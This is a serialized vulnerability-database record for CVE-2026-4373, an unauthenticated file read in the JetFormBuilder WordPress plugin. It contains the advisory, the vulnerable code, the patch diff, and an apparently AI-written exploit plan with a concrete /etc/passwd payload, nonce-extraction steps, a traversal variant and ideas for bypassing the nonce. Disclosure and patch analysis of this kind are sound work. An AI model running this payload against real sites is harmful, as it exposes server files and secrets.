[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fiExvi4WfueUpgBAflczm9zbZOJ_X21d0u6JYWZqWsBY":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":30,"research_verified":31,"research_rounds_completed":32,"research_plan":33,"research_summary":34,"research_vulnerable_code":35,"research_fix_diff":36,"research_exploit_outline":37,"research_model_used":38,"research_started_at":39,"research_completed_at":40,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":31,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":31,"source_links":41},"CVE-2026-4373","jetformbuilder-unauthenticated-arbitrary-file-read-via-media-field","JetFormBuilder \u003C= 3.5.6.2 - Unauthenticated Arbitrary File Read via Media Field","The JetFormBuilder plugin for WordPress is vulnerable to arbitrary file read via path traversal in all versions up to, and including, 3.5.6.2. This is due to the 'Uploaded_File::set_from_array' method accepting user-supplied file paths from the Media Field preset JSON payload without validating that the path belongs to the WordPress uploads directory. 
Combined with an insufficient same-file check in 'File_Tools::is_same_file' that only compares basenames, this makes it possible for unauthenticated attackers to exfiltrate arbitrary local files as email attachments by submitting a crafted form request when the form is configured with a Media Field and a Send Email action with file attachment.","jetformbuilder",null,"\u003C=3.5.6.2","3.5.6.3","high",7.5,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:U\u002FC:H\u002FI:N\u002FA:N","Absolute Path Traversal","2026-03-20 18:28:08","2026-03-21 06:45:14",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F1801fd3e-d56f-4540-9700-9e9de8b465e1?source=api-prod",1,[22,23,24,25,26,27,28,29],"includes\u002Fblocks\u002Frender\u002Fmedia-field-render.php","includes\u002Fclasses\u002Fresources\u002Ffile-tools.php","includes\u002Fclasses\u002Fresources\u002Fuploaded-file.php","jet-form-builder.php","modules\u002Factions-v2\u002Fsend-email\u002Fsend-email-action.php","modules\u002Fform-record\u002Fadmin\u002Fmeta-boxes\u002Fform-record-values-box.php","readme.txt","vendor\u002Fcomposer\u002Finstalled.php","researched",false,3,"# Exploit Research Plan - CVE-2026-4373 (JetFormBuilder Arbitrary File Read)\n\n## 1. Vulnerability Summary\nThe **JetFormBuilder** plugin (\u003C= 3.5.6.2) is vulnerable to an unauthenticated arbitrary file read. The vulnerability exists because the plugin trusts user-supplied file paths provided in the \"Media Field\" preset data. Specifically, the `Uploaded_File::set_from_array` method populates a file object's internal path from an array without validating if that path is within the WordPress uploads directory. \n\nWhen a form is submitted with a Media Field and a \"Send Email\" action configured to include attachments, an attacker can supply a crafted JSON payload for the Media Field. This payload points the \"internal file path\" to a sensitive local file (e.g., `\u002Fetc\u002Fpasswd`). 
Because `File_Tools::is_same_file` performs only a weak check (it compares the basename of the preset's user-supplied `url` with the name of the uploaded file and never examines the `file` path that is later attached), an attacker can pass that check and force the plugin to attach arbitrary local files to the outgoing email.\n\n## 2. Attack Vector Analysis\n- **Endpoint:** `wp-admin\u002Fadmin-ajax.php` (for AJAX submissions) or the permalink of a page containing a JetFormBuilder form.\n- **Action:** `jet_form_builder_submit` (AJAX action) or a direct POST request.\n- **Vulnerable Parameter:** The input field name corresponding to the **Media Field** (e.g., `my_media_field`).\n- **Payload:** A JSON-encoded array or structured POST data containing a `file` key pointing to the target absolute path and a `url` key whose basename matches the filename being \"uploaded\".\n- **Authentication:** Unauthenticated (if the form is public).\n- **Preconditions:** \n    1. A form must exist with a **Media Field**.\n    2. The form must have a **Send Email** Post-Submit Action.\n    3. The **Send Email** action must have the Media Field selected in its **Attachments** settings.\n\n## 3. Code Flow\n1. **Entry Point:** The user submits a form. JetFormBuilder processes the request via `Jet_Form_Builder\\Actions\\Action_Handler`.\n2. **Preset Processing:** During form processing, the plugin reconciles submitted files with \"presets\" (existing files).\n3. **Reconciliation:** `Jet_Form_Builder\\Classes\\Resources\\File_Tools::get_uploaded(File $file, $preset)` is called.\n    - `$file` is the object representing the file being uploaded in the current request.\n    - `$preset` is the user-controlled data provided for the field.\n4. **Weak Validation:** `File_Tools::is_same_file` is called:\n   ```php\n   protected static function is_same_file( File $file, Uploaded_File $uploaded_file ): bool {\n       $info = pathinfo( $uploaded_file->get_url() );\n       return $file->get_name() === ( $info['basename'] ?? 
'' );\n   }\n   ```\n   If the attacker provides a `url` like `http:\u002F\u002Flocalhost\u002Fpasswd` and uploads a file named `passwd`, this returns `true`.\n5. **Object Population (Sink):** `Uploaded_File::set_from_array(array $upload)` is called with the attacker's data:\n   ```php\n   public function set_from_array( array $upload ): Uploaded_File {\n       if ( isset( $upload['file'] ) ) {\n           $this->file = $upload['file']; \u002F\u002F Path injection: \u002Fetc\u002Fpasswd\n       }\n       ...\n   }\n   ```\n6. **Action Execution:** The `Send_Email_Action::do_action` method executes.\n7. **Exfiltration:** It calls `get_attachments()`, which eventually calls `Uploaded_File::get_attachment_file()`. This returns the injected `\u002Fetc\u002Fpasswd` path.\n8. **Sink:** `wp_mail()` is called with the local path in the `$attachments` array, causing WordPress to read the file and attach it to the email.\n\n## 4. Nonce Acquisition Strategy\nJetFormBuilder requires a nonce for form submission.\n\n1. **Identify Variable:** The plugin typically localizes form settings in a global JavaScript object named `JetFormBuilderSettings`.\n2. **Trigger Script Loading:** The script and nonce are only loaded on pages containing a `jet-form-builder` block.\n3. **Execution Steps:**\n    - Create a test page containing the target form: `wp post create --post_type=page --post_status=publish --post_content='[jet_form_builder id=\"ID_HERE\"]'`\n    - Navigate to this page using `browser_navigate`.\n    - Extract the nonce: `browser_eval(\"JetFormBuilderSettings.nonce\")`.\n    - Extract the Form ID if not known: `browser_eval(\"document.querySelector('input[name=\\\"_jfb_form_id\\\"]').value\")`.\n\n## 5. 
Exploitation Strategy\n### Step 1: Create a Form\nCreate a form with a Media Field and Send Email action using WP-CLI.\n\n### Step 2: Prepare Payload\nThe POST request must include:\n- `_jfb_form_id`: The ID of the form.\n- `_jfb_nonce`: The extracted nonce.\n- `field_name`: A JSON-encoded array containing the malicious file path.\n- `$_FILES['field_name']`: A dummy file with a matching name.\n\n### Step 3: Execute Request\nSend a multipart\u002Fform-data request to `admin-ajax.php`.\n\n**Payload Example (POST Body):**\n```text\naction: jet_form_builder_submit\n_jfb_form_id: 123\n_jfb_nonce: [nonce]\nmy_media_field: [{\"url\":\"http:\u002F\u002Flocalhost\u002Fpasswd\", \"file\":\"\u002Fetc\u002Fpasswd\"}]\n```\n**Files:**\n`my_media_field` -> file content: \"dummy\", filename: \"passwd\"\n\n## 6. Test Data Setup\n1. **Create the Form:**\n   ```bash\n   # Create a Form Post\n   FORM_ID=$(wp post create --post_type=jet-form-builder --post_title=\"Exploit Form\" --post_status=publish --porcelain)\n   \n   # Add Media Field and Email Action to the form content\u002Fmeta\n   # Note: JetFormBuilder stores actions in _jet_at_post_submit_actions meta\n   wp post meta update $FORM_ID _jet_at_post_submit_actions '[{\"id\":\"send_email\",\"settings\":{\"mail_to\":\"admin@example.com\",\"subject\":\"Exfiltrated\",\"attachments\":[\"my_media_field\"]}}]'\n   \n   # Set the form content (Media Field)\n   wp post update $FORM_ID --post_content='\u003C!-- wp:jet-form-builder\u002Fmedia-field {\"name\":\"my_media_field\",\"label\":\"Upload\"} \u002F-->\u003C!-- wp:jet-form-builder\u002Fsubmit-field {\"label\":\"Submit\"} \u002F-->'\n   ```\n2. **Create a Page:**\n   ```bash\n   PAGE_ID=$(wp post create --post_type=page --post_title=\"Submit Here\" --post_content=\"[jet_form_builder id=\\\"$FORM_ID\\\"]\" --post_status=publish --porcelain)\n   ```\n\n## 7. 
Expected Results\n- The HTTP response should indicate a successful submission (`{\"status\":\"success\"}`).\n- Internally, `wp_mail` will be called with `\u002Fetc\u002Fpasswd` as an attachment. \n- Since we cannot receive the email in a headless environment, we look for confirmation that the action was triggered with the malicious path.\n\n## 8. Verification Steps\n1. **Check Form Records:** If \"Store Form Record\" is enabled, verify the recorded path.\n   ```bash\n   wp jet-form-builder record list --fields=id,form_id\n   # Inspect the meta for the record to see if \u002Fetc\u002Fpasswd was processed\n   ```\n2. **Mock\u002FLog `wp_mail`:** Use a plugin like `WP Mail Logging` or use `wp eval` to check if any errors occurred during the email process that might reveal the attachment attempt.\n3. **Database Check:** If the form is configured to save metadata, check the `wp_postmeta` for the form record's ID to see if the `my_media_field` value contains `\u002Fetc\u002Fpasswd`.\n\n## 9. Alternative Approaches\n- **Path Traversal via URL:** If `\u002Fetc\u002Fpasswd` is blocked, try `..\u002F..\u002F..\u002F..\u002F..\u002F..\u002Fetc\u002Fpasswd` in the `file` parameter.\n- **Different Actions:** If \"Send Email\" is not present, check if \"Insert\u002FUpdate Post\" allows mapping the Media Field to a post meta field, which would then be readable via the REST API or frontend.\n- **Bypass Nonce:** Check if the nonce validation is omitted if the request is sent with a specific header or to a different endpoint (e.g., REST API). (Based on `Send_Email_Action::self_script_name`, the plugin might have specific handlers for different modules).","The JetFormBuilder plugin for WordPress is vulnerable to unauthenticated arbitrary file read due to improper path validation in the Media Field processing logic. 
An attacker can supply an absolute local file path in a crafted JSON payload, which the plugin subsequently uses as an email attachment if the 'Send Email' post-submit action is configured.","\u002F\u002F includes\u002Fclasses\u002Fresources\u002Fuploaded-file.php\n\npublic function set_from_array( array $upload ): Uploaded_File {\n\tif ( isset( $upload['file'] ) ) {\n\t\t$this->file = $upload['file'];\n\t}\n\tif ( isset( $upload['url'] ) ) {\n\t\t$this->url = $upload['url'];\n\t}\n\n---\n\n\u002F\u002F includes\u002Fclasses\u002Fresources\u002Ffile-tools.php\n\nprotected static function is_same_file( File $file, Uploaded_File $uploaded_file ): bool {\n\t$info = pathinfo( $uploaded_file->get_url() );\n\n\treturn $file->get_name() === ( $info['basename'] ?? '' );\n}","diff -ru \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fjetformbuilder\u002F3.5.6.2\u002Fincludes\u002Fblocks\u002Frender\u002Fmedia-field-render.php \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fjetformbuilder\u002F3.5.6.3\u002Fincludes\u002Fblocks\u002Frender\u002Fmedia-field-render.php\n--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fjetformbuilder\u002F3.5.6.2\u002Fincludes\u002Fblocks\u002Frender\u002Fmedia-field-render.php\t2025-07-02 07:54:48.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fjetformbuilder\u002F3.5.6.3\u002Fincludes\u002Fblocks\u002Frender\u002Fmedia-field-render.php\t2026-03-20 07:01:12.000000000 +0000\n@@ -75,7 +75,7 @@\n \t\t\t\u002F\u002F preset field\n \t\t\t$updated = str_replace( '\u003C!-- field -->', $this->get_field_preset( $file ), $updated );\n \n-\t\t\t$image_ext    = array( 'jpg', 'jpeg', 'jpe', 'gif', 'png', 'svg', 'webp' );\n+\t\t\t$image_ext    = array( 'jpg', 'jpeg', 'jpe', 'gif', 'png', 'svg', 'webp', 'avif' );\n \t\t\t$img_ext_preg = '!.(' . join( '|', $image_ext ) . 
')$!i';\n \n \t\t\tif ( preg_match( $img_ext_preg, $file['url'] ) ) {\ndiff -ru \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fjetformbuilder\u002F3.5.6.2\u002Fincludes\u002Fclasses\u002Fresources\u002Ffile-tools.php \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fjetformbuilder\u002F3.5.6.3\u002Fincludes\u002Fclasses\u002Fresources\u002Ffile-tools.php\n--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fjetformbuilder\u002F3.5.6.2\u002Fincludes\u002Fclasses\u002Fresources\u002Ffile-tools.php\t2023-11-20 11:46:54.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fjetformbuilder\u002F3.5.6.3\u002Fincludes\u002Fclasses\u002Fresources\u002Ffile-tools.php\t2026-03-20 07:01:12.000000000 +0000\n@@ -30,7 +30,13 @@\n \t}\n \n \tprotected static function is_same_file( File $file, Uploaded_File $uploaded_file ): bool {\n-\t\t$info = pathinfo( $uploaded_file->get_url() );\n+\t\t$preset_path = $uploaded_file->get_attachment_file();\n+\n+\t\tif ( ! $preset_path ) {\n+\t\t\treturn false;\n+\t\t}\n+\n+\t\t$info = pathinfo( $preset_path );\n \n \t\treturn $file->get_name() === ( $info['basename'] ?? 
'' );\n \t}\ndiff -ru \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fjetformbuilder\u002F3.5.6.2\u002Fincludes\u002Fclasses\u002Fresources\u002Fuploaded-file.php \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fjetformbuilder\u002F3.5.6.3\u002Fincludes\u002Fclasses\u002Fresources\u002Fuploaded-file.php\n--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fjetformbuilder\u002F3.5.6.2\u002Fincludes\u002Fclasses\u002Fresources\u002Fuploaded-file.php\t2025-07-02 07:54:48.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fjetformbuilder\u002F3.5.6.3\u002Fincludes\u002Fclasses\u002Fresources\u002Fuploaded-file.php\t2026-03-20 07:01:12.000000000 +0000\n@@ -96,17 +96,17 @@\n \n \tpublic function set_from_array( array $upload ): Uploaded_File {\n \t\tif ( isset( $upload['file'] ) ) {\n-\t\t\t$this->file = $upload['file'];\n+\t\t\t$this->file = self::normalize_allowed_upload_file_path( (string) $upload['file'] );\n \t\t}\n \t\tif ( isset( $upload['url'] ) ) {\n-\t\t\t$this->url = $upload['url'];\n+\t\t\t$this->url = esc_url_raw( (string) $upload['url'] );\n \t\t}\n \t\tif ( isset( $upload['type'] ) ) {\n-\t\t\t$this->type = $upload['type'];\n+\t\t\t$this->type = sanitize_mime_type( (string) $upload['type'] );\n \t\t}\n \t\tif ( isset( $upload['id'] ) ) {\n \n-\t\t\t$this->set_attachment_id( (string) $upload['id'] );\n+\t\t\t$this->set_attachment_id( (string) absint( $upload['id'] ) );\n \t\t}\n \n \t\treturn $this;\n@@ -185,7 +185,10 @@\n \t\t$file = $this->get_file();\n \n \t\tif ( $file ) {\n-\t\t\treturn $file;\n+\t\t\t$file = self::normalize_allowed_upload_file_path( $file );\n+\t\t\tif ( $file ) {\n+\t\t\t\treturn $file;\n+\t\t\t}\n \t\t}\n \n \t\t$id  = $this->get_attachment_id();\n@@ -197,13 +200,59 @@\n \n \t\t$file = get_attached_file( $id );\n \n-\t\treturn is_string( $file ) ? $file : '';\n+\t\tif ( ! 
is_string( $file ) ) {\n+\t\t\treturn '';\n+\t\t}\n+\n+\t\treturn self::normalize_allowed_upload_file_path( $file );\n \t}\n \n \t\u002F**\n \t * @param string $url\n \t *\u002F\n \tpublic function set_url( string $url ) {\n-\t\t$this->url = $url;\n+\t\t$this->url = esc_url_raw( $url );\n+\t}\n+\n+\t\u002F**\n+\t * Normalize path and allow only existing files inside wp-content uploads directory.\n+\t *\n+\t * @return string Normalized realpath to a file in uploads, or empty string.\n+\t *\u002F\n+\tpublic static function normalize_allowed_upload_file_path( string $file ): string {\n+\t\tif ( '' === $file ) {\n+\t\t\treturn '';\n+\t\t}\n+\n+\t\t$path = wp_normalize_path( $file );\n+\t\t$real = realpath( $path );\n+\n+\t\tif ( false === $real ) {\n+\t\t\treturn '';\n+\t\t}\n+\n+\t\t$real = wp_normalize_path( $real );\n+\t\t$real = untrailingslashit( $real );\n+\n+\t\t$uploads = wp_get_upload_dir();\n+\t\t$base    = (string) ( $uploads['basedir'] ?? '' );\n+\n+\t\tif ( '' === $base ) {\n+\t\t\treturn '';\n+\t\t}\n+\n+\t\t$base_real = realpath( $base );\n+\t\tif ( false === $base_real ) {\n+\t\t\treturn '';\n+\t\t}\n+\n+\t\t$base = wp_normalize_path( $base_real );\n+\t\t$base = untrailingslashit( $base );\n+\n+\t\tif ( 0 === strpos( $real, $base . 
'\u002F' ) && is_file( $real ) ) {\n+\t\t\treturn $real;\n+\t\t}\n+\n+\t\treturn '';\n \t}\n }\ndiff -ru \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fjetformbuilder\u002F3.5.6.2\u002Fmodules\u002Factions-v2\u002Fsend-email\u002Fsend-email-action.php \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fjetformbuilder\u002F3.5.6.3\u002Fmodules\u002Factions-v2\u002Fsend-email\u002Fsend-email-action.php\n--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fjetformbuilder\u002F3.5.6.2\u002Fmodules\u002Factions-v2\u002Fsend-email\u002Fsend-email-action.php\t2024-12-18 13:19:08.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fjetformbuilder\u002F3.5.6.3\u002Fmodules\u002Factions-v2\u002Fsend-email\u002Fsend-email-action.php\t2026-03-20 07:01:12.000000000 +0000\n@@ -5,6 +5,7 @@\n use Jet_Form_Builder\\Actions\\Action_Handler;\n use Jet_Form_Builder\\Actions\\Types\\Base;\n use Jet_Form_Builder\\Classes\\Http\\Http_Tools;\n+use Jet_Form_Builder\\Classes\\Resources\\Uploaded_File;\n use Jet_Form_Builder\\Classes\\Tools;\n use Jet_Form_Builder\\Exceptions\\Action_Exception;\n use Jet_Form_Builder\\Request\\Request_Tools;\n@@ -397,7 +398,29 @@\n \t\t\t);\n \t\t}\n \n-\t\treturn $attachments;\n+\t\treturn $this->filter_safe_attachments( $attachments );\n+\t}\n+\n+\t\u002F**\n+\t * Allow only readable files within the uploads directory.\n+\t *\u002F\n+\tprivate function filter_safe_attachments( array $attachments ): array {\n+\t\t$safe = array();\n+\n+\t\tforeach ( $attachments as $attachment ) {\n+\t\t\tif ( ! is_string( $attachment ) || '' === $attachment ) {\n+\t\t\t\tcontinue;\n+\t\t\t}\n+\n+\t\t\t$allowed = Uploaded_File::normalize_allowed_upload_file_path( $attachment );\n+\t\t\tif ( '' === $allowed || ! is_file( $allowed ) || ! 
is_readable( $allowed ) ) {\n+\t\t\t\tcontinue;\n+\t\t\t}\n+\n+\t\t\t$safe[] = $allowed;\n+\t\t}\n+\n+\t\treturn array_values( array_unique( $safe ) );\n \t}","To exploit this vulnerability, an attacker first identifies a JetFormBuilder form on the target site that uses a Media Field and has a 'Send Email' post-submit action configured to include that field as an attachment. The attacker obtains the necessary submission nonce from the page's source code. They then perform a multipart POST request to the `jet_form_builder_submit` action, including a crafted JSON payload in the Media Field's input name. This payload contains a `file` key pointing to a sensitive absolute path (e.g., `\u002Fetc\u002Fpasswd`) and a `url` key with a matching basename to bypass the plugin's internal consistency checks. Upon submission, the plugin validates the dummy file provided in the upload request against the preset JSON data, assigns the malicious absolute path to the file object, and subsequently attaches that file to the email sent by the 'Send Email' action.","gemini-3-flash-preview","2026-04-18 00:34:14","2026-04-18 00:34:51",{"type":42,"vulnerable_version":43,"fixed_version":11,"vulnerable_browse":44,"vulnerable_zip":45,"fixed_browse":46,"fixed_zip":47,"all_tags":48},"plugin","3.5.6.2","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fjetformbuilder\u002Ftags\u002F3.5.6.2","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fjetformbuilder.3.5.6.2.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fjetformbuilder\u002Ftags\u002F3.5.6.3","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fjetformbuilder.3.5.6.3.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fjetformbuilder\u002Ftags"]